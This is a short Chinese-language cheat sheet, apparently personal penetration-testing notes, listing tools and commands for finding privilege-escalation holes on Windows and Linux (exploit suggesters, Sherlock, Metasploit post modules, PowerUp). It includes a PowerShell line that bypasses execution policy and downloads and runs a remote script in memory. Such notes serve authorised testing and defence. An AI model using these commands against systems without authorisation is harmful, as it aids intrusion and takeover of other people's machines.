1,Windows-Exploit-Suggester
使用Windows-Exploit-Suggester解析systeminfo
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令
pip2.7 install xlrd==1.2.0
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2022-06-07-mssb.xls --systeminfo 1.txt
2,使用Linux-Exploit-Suggester.sh寻找linux提权问题
下载地址:https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh
3,使用Sherlock工具
下载地址:https://github.com/rasta-mouse/Sherlock
Import-Module Sherlock.ps1
Find-AllVulns
4,使用MSF查询补丁和可利用提权漏洞
他妈的发现多次的把目标机进程扫死
meterpreter> run post/windows/gather/enum_patches
meterpreter> run post/multi/recon/local_exploit_suggester
5,使用powerup检查提权漏洞
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
6,在线网页查询
查询地址:
http://bugs.hacking8.com/tiquan/
http://blog.neargle.com/win-powerup-exp-index/